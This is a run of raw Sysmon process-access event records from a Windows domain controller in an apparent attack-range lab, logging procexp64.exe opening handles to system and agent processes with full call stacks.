10341000x8000000000000000792295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\